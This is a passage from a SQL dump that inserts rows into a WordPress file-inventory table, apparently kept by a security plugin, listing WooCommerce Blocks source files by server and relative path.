home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-top-rated/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-top-rated/types.ts'),(9297,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/all-products/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/all-products/block.json'),(9298,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/all-products/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/all-products/block.tsx'),(9299,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/all-products/defaults.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/all-products/defaults.js'),(9300,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/all-products/deprecated.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/all-products/deprecated.js'),(9301,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/all-products/edit.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/all-products/edit.js'),(9302,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/all-products/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/all-products/editor.scss'),(9303,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/all-products/frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/all-products/frontend.js'),(9304,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/all-products/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/all-products/index.js'),(9305,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/all-products/save.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/all-products/save.js'),(9306,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/base-utils.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/base-utils.js'),(9307,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/edit-utils.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/edit-utils.js'),(9308,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/edit.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/edit.js'),(9309,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/utils.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products/utils.js'),(9310,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/block.json'),(9311,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/block.tsx'),(9312,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/edit-mode.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/edit-mode.tsx'),(9313,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/edit.tsx'),(9314,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/editor.scss'),(9315,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/index.tsx'),(9316,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/inspector-controls.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/inspector-controls.tsx'),(9317,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/types.ts'),(9318,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/block-wrapper.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/block-wrapper.tsx'),(9319,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/block.json'),(9320,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/block.tsx'),(9321,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/deprecated.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/deprecated.tsx'),(9322,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/edit.tsx'),(9323,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/editor.scss'),(9324,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/frontend.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/frontend.ts'),(9325,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/index.tsx'),(9326,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/preview.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/preview.tsx'),(9327,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/style.scss'),(9328,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/test/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/test/block.tsx'),(9329,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/types.ts'),(9330,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/rating-filter/utils.ts'),(9331,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/all-reviews/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/all-reviews/block.tsx'),(9332,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/all-reviews/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/all-reviews/edit.tsx'),(9333,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/all-reviews/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/all-reviews/index.tsx'),(9334,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/all-reviews/no-reviews-placeholder.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/all-reviews/no-reviews-placeholder.tsx'),(9335,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/all-reviews/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/all-reviews/types.ts'),(9336,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/attributes.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/attributes.ts'),(9337,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/edit-utils.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/edit-utils.js'),(9338,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/editor-block.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/editor-block.js'),(9339,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/editor-container-block.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/editor-container-block.js'),(9340,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/editor.scss'),(9341,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/example.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/example.js'),(9342,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/frontend-block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/frontend-block.tsx'),(9343,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/frontend-container-block.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/frontend-container-block.js'),(9344,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/frontend.js'),(9345,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-category/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-category/block.tsx'),(9346,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-category/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-category/edit.tsx'),(9347,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-category/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-category/index.tsx'),(9348,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-category/no-reviews-placeholder.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-category/no-reviews-placeholder.tsx'),(9349,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-category/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-category/types.ts'),(9350,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-product/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-product/edit.tsx'),(9351,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-product/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-product/editor.scss'),(9352,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-product/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-product/index.js'),(9353,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-product/no-reviews-placeholder.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-product/no-reviews-placeholder.js'),(9354,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-product/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/reviews-by-product/types.ts'),(9355,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/save.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/save.js'),(9356,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/test/frontend-block.test.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/test/frontend-block.test.tsx'),(9357,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/utils.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/reviews/utils.js'),(9358,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/shared/styles/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/shared/styles/style.scss'),(9359,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/block.json'),(9360,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/constants.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/constants.tsx'),(9361,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/edit/editor-block-controls.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/edit/editor-block-controls.tsx'),(9362,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/edit/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/edit/editor.scss'),(9363,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/edit/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/edit/index.tsx'),(9364,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/edit/layout-editor.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/edit/layout-editor.tsx'),(9365,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/edit/shared-product-control.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/edit/shared-product-control.tsx'),(9366,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/index.tsx'),(9367,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/save.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/save.tsx'),(9368,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/single-product/types.ts'),(9369,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/attributes.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/attributes.ts'),(9370,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/block-wrapper.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/block-wrapper.tsx'),(9371,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/block.json'),(9372,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/block.tsx'),(9373,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/deprecated.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/deprecated.tsx'),(9374,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/edit.tsx'),(9375,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/editor.scss'),(9376,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/frontend.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/frontend.ts'),(9377,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/index.tsx'),(9378,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/preview.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/preview.tsx'),(9379,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/style.scss'),(9380,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/test/__snapshots__/block.tsx.snap','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/test/__snapshots__/block.tsx.snap'),(9381,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/test/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/test/block.tsx'),(9382,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/types.ts'),(9383,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/stock-filter/utils.ts'),(9384,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/store-notices/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/store-notices/block.json'),(9385,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/store-notices/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/store-notices/edit.tsx'),(9386,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/store-notices/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/store-notices/editor.scss'),(9387,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/store-notices/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/store-notices/index.tsx'),(9388,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/block-components/get-registered-block-components.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/block-components/get-registered-block-components.ts'),(9389,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/block-components/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/block-components/index.js'),(9390,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/block-components/register-block-component.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/block-components/register-block-component.js'),(9391,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/block-components/registered-block-components-init.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/block-components/registered-block-components-init.ts'),(9392,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/block-components/test/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/block-components/test/index.js'),(9393,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/index.js'),(9394,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/assertions.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/assertions.ts'),(9395,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/express-payment-method-config.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/express-payment-method-config.ts'),(9396,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/extensions-config.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/extensions-config.ts'),(9397,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/index.ts'),(9398,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/payment-method-config-helper.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/payment-method-config-helper.ts'),(9399,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/payment-method-config.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/payment-method-config.tsx'),(9400,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/registry.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/registry.ts'),(9401,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/test/payment-method-config-helper.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/test/payment-method-config-helper.ts'),(9402,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/test/payment-method-config.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/test/payment-method-config.tsx'),(9403,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/test/registry.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks-registry/payment-methods/test/registry.ts'),(9404,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/action-types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/action-types.ts'),(9405,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/actions.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/actions.ts'); INSERT INTO `wpvt_wfknownfilelist` (`id`, `path`, `wordpress_path`) VALUES (9406,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/constants.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/constants.ts'),(9407,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/default-state.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/default-state.ts'),(9408,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/index.ts'),(9409,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/notify-errors.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/notify-errors.ts'),(9410,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/notify-quantity-changes.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/notify-quantity-changes.ts'),(9411,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/push-changes.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/push-changes.ts'),(9412,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/reducers.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/reducers.ts'),(9413,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/resolvers.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/resolvers.ts'),(9414,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/data/cart/selectors.ts','wp-content/plugins/woocommerce/packages/wooco